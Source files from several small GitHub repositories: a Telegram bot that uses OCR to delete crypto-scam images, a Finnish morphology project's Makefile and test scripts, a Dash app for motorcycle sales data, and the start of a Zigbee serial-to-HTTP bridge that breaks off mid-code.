notmyst33d/antimusk
|
https://github.com/notmyst33d/antimusk
|
c4737114cefbb19422d22c28b5d3b73c4e5ac7e9
|
46c79c30c7b9278af1f6ba31048c662bb6350d90
|
977e6acc1a3e013969b3978a2660f649cfeeddac
|
refs/heads/main
| 2023-07-18T04:41:38.747833 | 2021-09-05T18:28:06 | 2021-09-05T18:28:06 | 397,940,885 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6490868926048279,
"alphanum_fraction": 0.6509643197059631,
"avg_line_length": 33.467647552490234,
"blob_id": "5f51f95be22e491eaf9bc1a53c30bf2d4208379c",
"content_id": "92e27bcaed8ed03d8b1c78c082829afb297b9eb3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11726,
"license_type": "no_license",
"max_line_length": 263,
"num_lines": 340,
"path": "/antimusk.py",
"repo_name": "notmyst33d/antimusk",
"src_encoding": "UTF-8",
"text": "import os, pytesseract, uuid, json\nfrom PIL import Image\nfrom pyrogram import Client, filters, idle\nfrom datetime import datetime\n\nempty_chat_data = {\n \"blocked_words\": [],\n \"whitelist\": []\n}\n\nwith open(\"config.json\", \"r\") as f:\n config = json.loads(f.read())\n\ndef dump_config():\n with open(\"config.json\", \"w\") as f:\n f.write(json.dumps(config, indent=4))\n\napp = Client(\"antimusk\", config[\"api_id\"], config[\"api_hash\"], bot_token=config[\"bot_token\"]).start()\nme = app.get_me()\n\ndef split_list(lst, n):\n for i in range(0, len(lst), n):\n yield lst[i:i + n]\n\nasync def check_protected_filter(_, client, message):\n if config[\"chats\"].get(str(message.chat.id)):\n return True\n\nasync def check_authorized_filter(_, client, message):\n if message.from_user:\n if message.from_user.id in config[\"authorized_users\"] or message.from_user.username in config[\"authorized_users\"]:\n return True\n\nasync def check_not_whitelisted_filter(_, client, message):\n if message.from_user:\n if str(message.from_user.id) not in config[\"chats\"].get(str(message.chat.id), empty_chat_data)[\"whitelist\"]:\n return True\n\nasync def check_not_edited_filter(_, client, message):\n if not message.edit_date:\n return True\n\ncheck_protected = filters.create(check_protected_filter)\ncheck_authorized = filters.create(check_authorized_filter)\ncheck_not_whitelisted = filters.create(check_not_whitelisted_filter)\ncheck_not_edited = filters.create(check_not_edited_filter)\n\n# Special filter for unprotected chats\nasync def unprotected_chat(message):\n if message.chat.type == \"private\":\n return True\n\n if not config[\"chats\"].get(str(message.chat.id)):\n await message.reply(\"This chat is not protected, ask bot admins to add it to protected chats.\")\n return True\n else:\n return False\n\n# Special filter for handling admin commands\n# Its not a direct filter because it relies on client.get_chat_member() which can cause FloodWait error if overused\nasync def not_admin(client, message):\n if message.chat.type == \"private\":\n return True\n\n user = await client.get_chat_member(message.chat.id, message.from_user.id)\n if user.status == \"administrator\" or user.status == \"creator\":\n return False\n else:\n return True\n\[email protected]_message(check_not_edited & filters.command([\"start\", f\"start@{me.username}\"]))\nasync def start(client, message):\n if message.chat.type == \"private\":\n buffer = \"Hello, if you would like to add your chat to protected chats, you can ask any one of these bot admins:\\n\"\n\n try:\n users = await client.get_users(config[\"authorized_users\"])\n except:\n return await message.reply(\"Something went wrong while trying to get authorized users, this can happen if you added an ID to your authorized users, tell the user with that ID to interact with the bot, if problem persists check the configuration file\")\n\n for user in users:\n if user.username:\n buffer += f\"• @{user.username}\\n\"\n else:\n buffer += f\"• [{user.first_name}](tg://user?id={user.id})\\n\"\n\n return await message.reply(buffer)\n\[email protected]_message(check_not_whitelisted & check_protected & check_not_edited & filters.photo)\nasync def ocr_search(client, message):\n request_uuid = str(uuid.uuid4())\n target = \"data/\" + request_uuid + \".jpg\"\n\n await message.download(target)\n im = Image.open(target)\n\n tessract_data = pytesseract.image_to_string(im).lower()\n filtered_output = []\n\n for data_entry in tessract_data.split(\" \"):\n 
filtered_output.extend(data_entry.split(\"\\n\"))\n\n for word in config[\"chats\"][str(message.chat.id)][\"blocked_words\"]:\n if word in filtered_output:\n if not config[\"chats\"][str(message.chat.id)].get(\"silentmode\", False):\n await message.reply(f\"Found blocked word: `{word}`\")\n\n try:\n await message.delete()\n except:\n if not config[\"chats\"][str(message.chat.id)].get(\"silentmode\", False):\n await message.reply(\"Unfortunately i cant delete this message for some reason\")\n\n break\n\n im.close()\n os.remove(target)\n\[email protected]_message(check_authorized & check_not_edited & filters.command([\"reload\", f\"reload@{me.username}\"]))\nasync def reload(client, message):\n global config\n\n with open(\"config.json\", \"r\") as f:\n config = json.loads(f.read())\n\n await message.reply(\"Config successfully reloaded\")\n\[email protected]_message(check_authorized & check_not_edited & filters.command([\"protect\", f\"protect@{me.username}\"]))\nasync def protect(client, message):\n if message.chat.type == \"private\":\n args = message.text.split(\" \")\n\n if len(args) < 2:\n return await message.reply(\"You need to provide chat username or ID\")\n\n try:\n chat = await client.get_chat(args[1])\n except:\n return await message.reply(\"Chat not found, you need to add the bot in the chat\")\n\n chat_id = str(chat.id)\n else:\n chat_id = str(message.chat.id)\n\n if chat_id in config[\"chats\"]:\n return await message.reply(\"This chat is already protected\")\n\n config[\"chats\"][chat_id] = empty_chat_data\n\n dump_config()\n\n await message.reply(\"Added to protected chats\")\n\[email protected]_message(check_authorized & check_not_edited & filters.command([\"unprotect\", f\"unprotect@{me.username}\"]))\nasync def unprotect(client, message):\n if message.chat.type == \"private\":\n args = message.text.split(\" \")\n\n if len(args) < 2:\n return await message.reply(\"You need to provide chat username or ID\")\n\n try:\n chat = await client.get_chat(args[1])\n except:\n return await message.reply(\"Chat not found, you need to add the bot in the chat\")\n\n chat_id = str(chat.id)\n else:\n chat_id = str(message.chat.id)\n\n if chat_id not in config[\"chats\"]:\n return await message.reply(\"This chat is not protected\")\n\n del config[\"chats\"][chat_id]\n\n dump_config()\n\n await message.reply(\"Removed from protected chats\")\n\[email protected]_message(check_not_edited & filters.command([\"blockword\", f\"blockword@{me.username}\"]))\nasync def blockword(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n args = message.text.split(\" \")\n\n if len(args) < 2:\n return await message.reply(\"Please provide a word or a list of words\")\n\n args.pop(0)\n\n for word in args:\n if word.lower() not in config[\"chats\"][str(message.chat.id)][\"blocked_words\"]:\n config[\"chats\"][str(message.chat.id)][\"blocked_words\"].append(word.lower())\n\n dump_config()\n\n await message.reply(\"Added to blocked words\")\n\[email protected]_message(check_not_edited & filters.command([\"unblockword\", f\"unblockword@{me.username}\"]))\nasync def unblockword(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n args = message.text.split(\" \")\n\n if len(args) < 2:\n return await message.reply(\"Please provide a word or a list of words\")\n\n args.pop(0)\n\n for word in args:\n if word.lower() in config[\"chats\"][str(message.chat.id)][\"blocked_words\"]:\n 
config[\"chats\"][str(message.chat.id)][\"blocked_words\"].remove(word.lower())\n\n dump_config()\n\n await message.reply(\"Removed from blocked words\")\n\[email protected]_message(check_not_edited & filters.command([\"listblockedwords\", f\"listblockedwords@{me.username}\"]))\nasync def listblockedwords(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n buffer = \"Blocked words:\\n\"\n\n for word in config[\"chats\"][str(message.chat.id)][\"blocked_words\"]:\n buffer += f\"• `{word}`\\n\"\n\n await message.reply(buffer)\n\[email protected]_message(check_not_edited & filters.command([\"listwhitelist\", f\"listwhitelist@{me.username}\"]))\nasync def listwhitelist(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n buffer = \"Whitelisted users:\\n\"\n\n user_lists = split_list(config[\"chats\"][str(message.chat.id)][\"whitelist\"], 200)\n\n for user_list in user_lists:\n try:\n users = await client.get_users(user_list)\n for user in users:\n buffer += f\"• `{user.id} ({user.first_name})`\\n\"\n except Exception as e:\n buffer += str(e)\n\n await message.reply(buffer)\n\[email protected]_message(check_not_edited & filters.command([\"whitelist\", f\"whitelist@{me.username}\"]))\nasync def whitelist(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n args = message.text.split(\" \")\n\n if len(args) < 2:\n return await message.reply(\"Please provide a username or ID\")\n\n try:\n user = await client.get_users(args[1])\n except:\n return await message.reply(\"User not found\")\n\n if user.id == me.id:\n return await message.reply(\"I cant whitelist myself\")\n\n if str(user.id) in config[\"chats\"][str(message.chat.id)][\"whitelist\"]:\n return await message.reply(\"This user is already whilelisted\")\n\n config[\"chats\"][str(message.chat.id)][\"whitelist\"].append(str(user.id))\n\n dump_config()\n\n await message.reply(\"User whitelisted\")\n\[email protected]_message(check_not_edited & filters.command([\"unwhitelist\", f\"unwhitelist@{me.username}\"]))\nasync def unwhitelist(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n args = message.text.split(\" \")\n\n if len(args) < 2:\n return await message.reply(\"Please provide a username or ID\")\n\n try:\n user = await client.get_users(args[1])\n except:\n return await message.reply(\"User not found\")\n\n if str(user.id) not in config[\"chats\"][str(message.chat.id)][\"whitelist\"]:\n return await message.reply(\"This user is not whilelisted\")\n\n config[\"chats\"][str(message.chat.id)][\"whitelist\"].remove(str(user.id))\n\n dump_config()\n\n await message.reply(\"User unwhitelisted\")\n\[email protected]_message(check_not_edited & filters.command([\"clearblockedwords\", f\"clearblockedwords@{me.username}\"]))\nasync def clearblockedwords(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n config[\"chats\"][str(message.chat.id)][\"blocked_words\"] = []\n\n dump_config()\n\n await message.reply(\"Blocked words cleared\")\n\[email protected]_message(check_not_edited & filters.command([\"clearwhitelist\", f\"clearwhitelist@{me.username}\"]))\nasync def clearwhitelist(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n config[\"chats\"][str(message.chat.id)][\"whitelist\"] = []\n\n dump_config()\n\n await message.reply(\"Whitelist 
cleared\")\n\[email protected]_message(check_not_edited & filters.command([\"silentmode\", f\"silentmode@{me.username}\"]))\nasync def silentmode(client, message):\n if await unprotected_chat(message) or await not_admin(client, message): return\n\n args = message.text.split(\" \")\n\n if len(args) < 2:\n config[\"chats\"][str(message.chat.id)][\"silentmode\"] = not config[\"chats\"][str(message.chat.id)].get(\"silentmode\", False)\n else:\n if args[1].lower() == \"on\":\n config[\"chats\"][str(message.chat.id)][\"silentmode\"] = True\n elif args[1].lower() == \"off\":\n config[\"chats\"][str(message.chat.id)][\"silentmode\"] = False\n else:\n return await message.reply(f\"Unknown value \\\"{args[1]}\\\", please choose on/off\")\n\n dump_config()\n\n if config[\"chats\"][str(message.chat.id)][\"silentmode\"] == True:\n await message.reply(\"Silent mode: on\")\n else:\n await message.reply(\"Silent mode: off\")\n\nprint(\"AntiMusk started\")\nidle()"
},
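The OCR pipeline in `antimusk.py` above boils down to a few steps: download the photo, run Tesseract over it, and intersect the lower-cased tokens with the chat's blocked-word list. A self-contained sketch of that check (the word list here is a made-up example, not from the original config):

```python
import pytesseract
from PIL import Image

BLOCKED_WORDS = {"bitcoin", "giveaway"}  # assumed example values

def contains_blocked_word(path: str) -> bool:
    """OCR an image and report whether any blocked word appears in it."""
    with Image.open(path) as im:
        text = pytesseract.image_to_string(im).lower()
    # split() covers both the space and newline splitting done in the bot
    return any(word in BLOCKED_WORDS for word in text.split())
```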
{
"alpha_fraction": 0.743922233581543,
"alphanum_fraction": 0.7536466717720032,
"avg_line_length": 47.71052551269531,
"blob_id": "7a5ba7ddd4e1b318342c8e8bbcba53a14d782842",
"content_id": "c4aa302e7713833593d20d333fd7f7d44da38757",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1851,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 38,
"path": "/README.md",
"repo_name": "notmyst33d/antimusk",
"src_encoding": "UTF-8",
"text": "# AntiMusk\nSimple bot for deleting crypto scam messages\n\n## How it works\nIt uses Tesseract OCR to scan photos for blocked words, its primarily used to detect and delete photos like this:\n<img src=\"https://i.imgur.com/dRxf1RU.jpg\" width=\"400\">\n\n## Installing\n1. `git clone https://github.com/notmyst33d/antimusk`\n2. `cd antimusk`\n3. Create a copy of `config_template.json` and rename it to `config.json`\n4. Replace `api_id` and `api_hash` in `config.json` with your api_id and api_hash from [my.telegram.org](https://my.telegram.org)\n5. Get your bot token from [@BotFather](https://t.me/BotFather) and replace `bot_token` in `config.json` with that token\n6. `pip install -r requirements.txt`\n7. Install Tesseract (i recommend you to use Tesseract 5 since its faster and more accurate)\n8. Add your username or ID to `authorized_users` in `config.json`\n9. `python antimusk.py`\n10. Add protected chats using `/protect` command\n\nAfter you started the bot it should start waiting for photos in your protected chats, every photo that has a blocked word is saved on your disk and logged to `log.txt`\n\n## Commands\nAll commands only respond to chat admins, except for `/start`, `/protect`, `/unprotect` and `/reload`\n```\n/start - Get start message (only PM)\n/protect - Add chat to protected chats (only for bot admins)\n/unprotect - Remove chat from protected chats (only for bot admins)\n/reload - Reload configuration file (only for bot admins)\n/blockword - Block a word or a list of words\n/unblockword - Unblock a word or a list of words\n/whitelist - Add a user to a whitelist\n/unwhitelist - Remove a user from a whitelist\n/listblockedwords - Get a list of blocked words\n/listwhitelist - Get a list of whitelisted users\n/clearblockedwords - Clear a list of blocked words\n/clearwhitelist - Clear a list of whitelisted users\n/silentmode - Toggle silent mode\n```\n"
}
] | 2 |
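The README refers to `config_template.json`, which is not included in this record. Judging from how `antimusk.py` reads its configuration, a plausible shape for `config.json` would be the following (all values are placeholders):

```python
EXAMPLE_CONFIG = {
    "api_id": 12345,                      # from my.telegram.org (placeholder)
    "api_hash": "0123456789abcdef",       # placeholder
    "bot_token": "123456:ABC-DEF",        # from @BotFather (placeholder)
    "authorized_users": ["example_admin"],
    "chats": {
        "-1001234567890": {               # chat ids are stored as string keys
            "blocked_words": ["bitcoin"],
            "whitelist": ["111111111"],   # user ids are stored as strings
            "silentmode": False,
        }
    },
}
```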
redyeti/nlp
|
https://github.com/redyeti/nlp
|
b3dba0f622dc86902ea64b7c234070c63ea6c2b5
|
8878495d1bd754101b592f3d614b754e2c63236d
|
ddba7f1463ad216fd8d8b44e127b376c04ee7b24
|
refs/heads/master
| 2021-01-23T13:16:56.469475 | 2014-12-10T22:33:48 | 2014-12-10T22:33:48 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5789473652839661,
"alphanum_fraction": 0.5993208885192871,
"avg_line_length": 23.54166603088379,
"blob_id": "90bd6e6004d293a38d824922caab703ec7309a52",
"content_id": "3aceb8a0e8b99aaa2c59bac5dc1d5057e7890802",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 589,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 24,
"path": "/fixtest.py",
"repo_name": "redyeti/nlp",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport sys\n\nlines = sys.stdin.readlines()\nfor i in range(len(lines)):\n\ttry:\n\t\tif \"*** NONE ***\" in lines[i+1] and \"*** NONE ***\" in lines[i+2]:\n\t\t\t# ignore \"errors\" where no match expected and no match\n\t\t\tlines[i+1] = \"\"\n\t\t\tlines[i+2] = \"\"\n\t\t\tlines[i+3] = \"\"\n\t\t\tcontinue\n\t\telif \"WARNING 241:\" in lines[i]:\n\t\t\t# ignore WARNING 241\n\t\t\tlines[i+1] = \"\"\n\t\t\tcontinue\n\t\telse:\n\t\t\t# print all other lines\n\t\t\tif lines[i].strip():\n\t\t\t\tprint lines[i].strip()\n\texcept IndexError:\n\t\t# make sure all lines at the end are printed\n\t\tif lines[i].strip():\n\t\t\tprint lines[i].strip()\n"
},
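`fixtest.py` above is Python 2 (`print` statements). A direct Python 3 rendering of the same look-ahead filtering, preserving the IndexError-based end-of-input handling, would look like this (a sketch, not part of the repository):

```python
import sys

lines = sys.stdin.readlines()
for i in range(len(lines)):
    try:
        if "*** NONE ***" in lines[i + 1] and "*** NONE ***" in lines[i + 2]:
            # ignore "errors" where no match was expected and none was found
            lines[i + 1] = lines[i + 2] = lines[i + 3] = ""
        elif "WARNING 241:" in lines[i]:
            # ignore WARNING 241 and the line that follows it
            lines[i + 1] = ""
        elif lines[i].strip():
            # print all other non-empty lines
            print(lines[i].strip())
    except IndexError:
        # make sure the lines at the very end are still printed
        if lines[i].strip():
            print(lines[i].strip())
```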
{
"alpha_fraction": 0.6528354287147522,
"alphanum_fraction": 0.6721991896629333,
"avg_line_length": 30.39130401611328,
"blob_id": "a0710f6efaa1f2c24b17743d2608003b5c3f5d79",
"content_id": "18be67984bc1e2354bd1c93cfea231e2f4290fb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 723,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 23,
"path": "/Makefile",
"repo_name": "redyeti/nlp",
"src_encoding": "UTF-8",
"text": "SHELL=/bin/bash\nPCKIMMO = ./repo/pckimmo\nKGEN = ./repo/kgen\nPROJECT = assignment\n\nexport LC_CTYPE = fi_FI.iso88591\n\n.PHONY: kimmo interactive kgen test\n\ninteractive: $(PROJECT)/finnish.rul Makefile\n\t$(PCKIMMO) -r $(PROJECT)/finnish.rul -l $(PROJECT)/finnish.lex\n\nkgen: $(PROJECT)/finnish.rul Makefile\n\n$(PROJECT)/finnish.rul: $(PROJECT)/finnish.kgen Makefile\n\t! ( bash -c \"iconv -f utf8 -t latin1 <$< | $(KGEN) | iconv -f latin1 -t utf8 >$@\" 2>&1 | grep .. && rm $@ )\n\ntest: $(PROJECT)/finnish.rul $(PROJECT)/*.rec $(PROJECT)/test.tak Makefile\n\t$(PCKIMMO) -r $(PROJECT)/finnish.rul -l $(PROJECT)/finnish.lex -t $(PROJECT)/test.tak 2>&1 | ./fixtest.py\n\narchive:\n\t@git status\n\t@git archive --prefix nlp/ -o nlp.tar.bz2 HEAD\t\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5769230723381042,
"avg_line_length": 25,
"blob_id": "e4e6b80fd4e39c5371c89727d23a4a0dce7fcb1a",
"content_id": "51a147d9367cf6e05d8bb24e3d7301275a96d4a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 2,
"path": "/recode.sh",
"repo_name": "redyeti/nlp",
"src_encoding": "UTF-8",
"text": "iconv -f latin1 -t utf8 -o temp~ \"$1\"\nmv temp~ \"$1\"\n"
}
] | 3 |
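The Makefile and `recode.sh` above both shell out to `iconv` to convert between latin1 and utf8. The same in-place re-encode can be done in pure Python; a sketch (the file-handling details are my own, not from the repo):

```python
import sys

def recode(path: str) -> None:
    """Rewrite a latin-1 encoded file in place as UTF-8."""
    with open(path, encoding="latin-1") as f:
        text = f.read()
    with open(path, "w", encoding="utf-8") as f:
        f.write(text)

if __name__ == "__main__":
    recode(sys.argv[1])
```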
febrianrachmad/Final_Project
|
https://github.com/febrianrachmad/Final_Project
|
5ced1b8cc9a1cc5f910d2c62e82dc28c3e67a6bc
|
4589840b3ad6ab05cce9d78e033a7ce1a9c0a491
|
2915570053bc60266340b90c88408d53457bce9f
|
refs/heads/master
| 2020-09-24T20:54:14.108702 | 2019-12-04T10:34:33 | 2019-12-04T10:34:33 | 225,841,257 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4172069728374481,
"alphanum_fraction": 0.4289276897907257,
"avg_line_length": 41.13978576660156,
"blob_id": "e7b0787f25246a8af898cad8906349a41b658ac9",
"content_id": "29f1430edd6c43f2f6371ddaa08efe69a4b2e13f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4010,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 93,
"path": "/Coba_Data_Motor.py",
"repo_name": "febrianrachmad/Final_Project",
"src_encoding": "UTF-8",
"text": "import dash\r\nimport dash_table\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nimport pandas as pd\r\nimport plotly.graph_objs as go\r\nfrom dash.dependencies import Input, Output,State\r\n\r\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\n\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\ndfhonda = pd.read_excel('Penjualan_Motor_20052018.xlsx', index_col = 0)\r\n\r\ndef generate_table(dataframe, page_size = 10):\r\n return dash_table.DataTable(\r\n id = 'dataTable',\r\n columns = [{\"name\": i, \"id\": i} for i in dataframe.columns],\r\n data=dataframe.to_dict('records'),\r\n page_action=\"native\",\r\n page_current= 0,\r\n page_size= page_size,\r\n )\r\n\r\napp.layout = html.Div([\r\n html.H1('Ini Coba Data Motor'),\r\n html.P('Disuruh Sama Mas Cornellius, wkwkwkwkkw'),\r\n html.Div([html.Div(children =[\r\n dcc.Tabs(value = 'tabs', id = 'tabs-1', children = [\r\n dcc.Tab(value = 'Tabel', label = 'DataFrame Table', children =[\r\n html.Center(html.H1('DATAFRAME PENJUALAN MOTOR 2005 - 2018')),\r\n html.Div(children =[\r\n html.Div(children =[\r\n html.P('Penjualan:'),\r\n dcc.Dropdown(value = '', id='filter-penjualan', options = [\r\n {'label':'Honda','value':'Honda'},\r\n {'label':'Yamaha', 'value':'Yamaha'},\r\n {'label':'Suzuki', 'value':'Suzuki'},\r\n {'label':'Kawasaki', 'value':'Kawasaki'},\r\n {'label':'Others', 'value':'Others'},\r\n {'label':'Total', 'value':'Total'},\r\n {'label':'ALL', 'value':''}\r\n\r\n ], className = 'col-3')\r\n ], className = 'row'),\r\n html.Div([\r\n html.P('Max Rows : '),\r\n dcc.Input(\r\n id='filter-row',\r\n type='number',\r\n value=10,\r\n )\r\n ], className = 'row col-3'),\r\n html.Br(),\r\n html.Div(children =[\r\n html.Button('cari dong bos',id = 'filter')\r\n ],className = 'col-4'),\r\n html.Br(), \r\n html.Div(id = 'div-table', children =[generate_table(dfhonda)])\r\n ])\r\n ])\r\n ], \r\n ## Tabs Content Style\r\n content_style = {\r\n 'fontFamily': 'Arial',\r\n 'borderBottom': '1px solid #d6d6d6',\r\n 'borderLeft': '1px solid #d6d6d6',\r\n 'borderRight': '1px solid #d6d6d6',\r\n 'padding': '44px'\r\n })\r\n ])\r\n], style ={\r\n 'maxWidth': '1800px',\r\n 'margin': '0 auto'\r\n })\r\n])\r\n\r\[email protected](\r\n Output(component_id = 'div-table', component_property = 'children'),\r\n [Input(component_id = 'filter', component_property = 'n_clicks')],\r\n [State(component_id = 'filter-penjualan', component_property = 'value'),\r\n State(component_id = 'filter-row', component_property = 'value')]\r\n)\r\n\r\ndef update_table(n_clicks, penjualan, row):\r\n if penjualan == '':\r\n children = [generate_table(dfhonda, page_size = row)]\r\n else:\r\n children = [generate_table(dfhonda[dfhonda['Honda'] == penjualan], page_size = row)] \r\n return children\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)"
}
] | 1 |
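The Dash app above follows a common pattern: a button `Input` triggers the callback, while the dropdown and row-count widgets are passed as `State` so that typing in them does not re-render the table. A stripped-down sketch of that pattern with stand-in data (the column names are borrowed from the record):

```python
import dash
import dash_table
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
import pandas as pd

app = dash.Dash(__name__)
df = pd.DataFrame({"Honda": [100, 200], "Yamaha": [90, 180]})  # stand-in data

app.layout = html.Div([
    dcc.Dropdown(id="col", value="Honda",
                 options=[{"label": c, "value": c} for c in df.columns]),
    html.Button("filter", id="go"),
    html.Div(id="out"),
])

@app.callback(Output("out", "children"),
              [Input("go", "n_clicks")],   # the button click fires the callback
              [State("col", "value")])     # the dropdown is read, not a trigger
def show(n_clicks, col):
    view = df[[col]]                       # keep only the chosen column
    return dash_table.DataTable(
        columns=[{"name": c, "id": c} for c in view.columns],
        data=view.to_dict("records"))

if __name__ == "__main__":
    app.run_server(debug=True)
```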
hakaesbe/zigbee_server.py
|
https://github.com/hakaesbe/zigbee_server.py
|
5cd9cff81ffc1719bf76f83befba6f5ed8801f9b
|
6c37d23e734366a4c4fab8e9a33264995a7d4b41
|
9d6c3d1b9646be071fcfbe126c4d20a97aa933a4
|
refs/heads/master
| 2021-01-21T19:13:58.983445 | 2017-06-01T19:25:07 | 2017-06-01T19:25:07 | 92,131,658 | 2 | 1 | null | 2017-05-23T05:09:32 | 2017-02-02T16:51:45 | 2015-05-19T09:17:29 | null |
[
{
"alpha_fraction": 0.47999998927116394,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 15.666666984558105,
"blob_id": "d361cfc27e2b724768993af875c28e54fac2225c",
"content_id": "f6a592393c49528a1816667f463444ac56549f24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "hakaesbe/zigbee_server.py",
"src_encoding": "UTF-8",
"text": "eventlet==0.19.0\ngreenlet==0.4.10\npyserial==3.1.1\n"
},
{
"alpha_fraction": 0.38702327013015747,
"alphanum_fraction": 0.4012369215488434,
"avg_line_length": 39.15904235839844,
"blob_id": "e9798e55c4c28d0aeca203ac618c8db41b3ab55b",
"content_id": "19bed11bedb1e6d23b832b2c15d5783a98f0c0b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18433,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 459,
"path": "/zigbee_server.py",
"repo_name": "hakaesbe/zigbee_server.py",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport serial\nimport requests\nimport sys\nimport time\nimport os\nimport shutil\nimport urlparse\nimport eventlet\nimport ConfigParser\nfrom BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer\n\n# Config\nconfig = ConfigParser.ConfigParser()\nconfig.read('config.cfg')\nUSB_PATH = config.get('ZIGBEE', 'USB_PATH')\nSERVER_ZIGBEE_IP = config.get('ZIGBEE', 'ip')\nSERVER_ZIGBEE_PORT = config.get('ZIGBEE', 'port')\nZIGBEE_DEVICES_PATH = config.get('ZIGBEE', 'devices_path')\nZIGBEE_TMP_PATH = config.get('ZIGBEE', 'tmp_path')\nSERVER_DOMOTICZ_PROTOCOL = config.get('DOMOTICZ', 'protocol')\nSERVER_DOMOTICZ_IP = config.get('DOMOTICZ', 'ip')\nSERVER_DOMOTICZ_PORT = config.get('DOMOTICZ', 'port')\nSERVER_DOMOTICZ_GETTER = config.get('DOMOTICZ', 'getter')\n\n# Commands\nINIT = 'INIT'\nINFO = 'INFO'\nRESET = 'RESET'\nJOIN = 'JOIN'\nNETINFO = 'NETINFO'\nDISCOVER = 'DISCOVER'\nENDPOINT = 'ENDPOINT'\nIDENTIFY = 'IDENTIFY'\nMOVEUP = 'MOVEUP'\nMOVEDOWN = 'MOVEDOWN'\nMOVETO = 'MOVETO'\nSTATUS = 'STATUS'\nDIRECT = 'DIRECT'\n\n# Params\nALL = 'ALL'\nOK = 'OK'\nLEVEL = 'LEVEL'\n\n# Errors\nerrors = ConfigParser.ConfigParser()\nerrors.read('errors.cfg')\n\n# Other\nTIME_TO_SLEEP = 0.2\n\nline = \"\"\neui_dongle = \"\"\ndevice = list()\neventlet.monkey_patch()\nser = serial.Serial(USB_PATH, 19200, timeout=1)\n\n\ndef delai():\n time.sleep(TIME_TO_SLEEP)\n\n\ndef send_order(order):\n global line\n global eui_dongle\n ser.write(order)\n line = \"\"\n while OK not in line:\n delai()\n line = ser.readline()\n print_line(line)\n if \"Telegesis\" in line:\n delai()\n line = ser.readline()\n delai()\n line = ser.readline()\n eui_dongle = line\n eui_dongle = eui_dongle.replace(\"\\r\", \"\")\n eui_dongle = eui_dongle.replace(\"\\n\", \"\")\n print eui_dongle\n line = \"\"\n print '------------------------------------------'\n\n\ndef print_line(output):\n output = output.replace(\"\\r\", \"\")\n output = output.replace(\"\\n\", \"\")\n output = output.strip()\n if output != '':\n if 'ERROR:' not in output:\n print output\n else:\n print_red(output + \" - \" + errors.get('ERRORS', output.split(':')[1]))\n\n\ndef print_red(prt):\n print(\"\\033[91m{}\\033[00m\".format(prt))\n\n\ndef format_level(level):\n a = -0.0084\n b = 3.04\n c = 35\n level = level * level * a + level * b + c\n level = int(level)\n return format(level, '02X')\n\n\nclass ZigbeeServer(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n\n path = self.path\n tmp = urlparse.urlparse(path).query\n qs = urlparse.parse_qs(tmp)\n\n if INIT in qs:\n print(\"Processing command [\" + INIT + \"]\")\n send_order(\"AT+PANSCAN\\r\")\n\n elif INFO in qs:\n print(\"Processing command [\" + INFO + \"]\")\n send_order(\"ATI\\r\")\n\n elif RESET in qs:\n print(\"Processing command [\" + RESET + \"]\")\n send_order(\"ATZ\\r\")\n\n elif JOIN in qs:\n print(\"Processing command [\" + JOIN + \"]\")\n send_order(\"AT+JN\\r\")\n\n elif NETINFO in qs:\n print(\"Processing command [\" + NETINFO + \"]\")\n send_order(\"AT+N\\r\")\n\n elif DISCOVER in qs:\n print(\"Processing command [\" + DISCOVER + \"]\")\n device_file = open(ZIGBEE_DEVICES_PATH, 'w')\n nbr_device = qs.get('DISCOVER')[0]\n i = 1\n index = 0\n ident = \"FF\"\n index_ident = 0\n while len(list(set(device))) < int(nbr_device):\n while i == 1:\n ser.write(\"AT+NTABLE:0\" + str(index) + \",\" + ident + \"\\r\")\n time.sleep(1)\n cont = 0\n i = 0\n sousindex = 0\n dline = \"\"\n while 
